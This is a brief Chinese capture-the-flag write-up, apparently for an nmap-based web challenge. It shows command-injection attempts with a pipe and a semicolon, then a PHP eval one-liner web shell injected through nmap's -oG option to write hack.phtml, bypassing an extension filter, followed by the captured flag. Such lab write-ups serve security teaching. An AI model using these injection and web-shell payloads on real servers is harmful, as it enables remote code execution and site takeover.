输入127.0.0.1,得到界面
根据题目namp得知是命令执行,输入127.0.0.1 | ls
输入127.0.0.1 | ls
可以看到
|
被\
转义,尝试使用;
看看分号能不能执行命令执行
我们发现分号也被转义了,那就很难使用命令执行了
尝试输入一句话木马:
127.0.0.1 | ' <?php @eval($_POST['zrtonnn']);?> -oG hack.php '
发现8行
后端应该是做了限制,尝试修改文件名后缀为phtml
127.0.0.1 | ' <?= eval($_POST[zrtonnn]);?> -oG hack.phtml '
得到扫描结果
查看写入的文件,即访问hack.phtml
成功上传,一剑连接一下看看
得到flag
flag{40f47690-9621-4e0e-85ba-2c1c43254c2e}